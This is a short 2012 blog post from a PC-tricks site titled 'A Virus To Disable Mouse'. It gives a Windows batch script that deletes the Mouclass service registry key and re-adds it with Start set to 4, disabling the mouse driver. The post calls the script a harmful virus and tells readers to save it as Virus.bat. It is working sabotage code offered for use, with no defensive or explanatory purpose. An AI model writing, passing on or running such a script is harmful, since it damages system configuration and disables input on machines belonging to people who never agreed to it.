Welcome to pctricksstuff.com for more updates like us on facebook

Pages

Labels

Monday 12 November 2012

A Virus To Disable Mouse


Make A Virus Through Batch Programming.

I Had Previously Posted On Making Different Batch Files Like Matrix Effect, Opening No Of Websites With One Click Which Were Interesting And Completely Harmless.

But Today We Will Be Making A Batch Virus Which Is Harmfull It Will Disable Your Mouse So Think Before Trying It On Yourself.




rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------

Save It As A Bat File .

Ex: Virus.bat Or Whatever U Want .

And That's It Your Virus Is Created.

No comments:

Post a Comment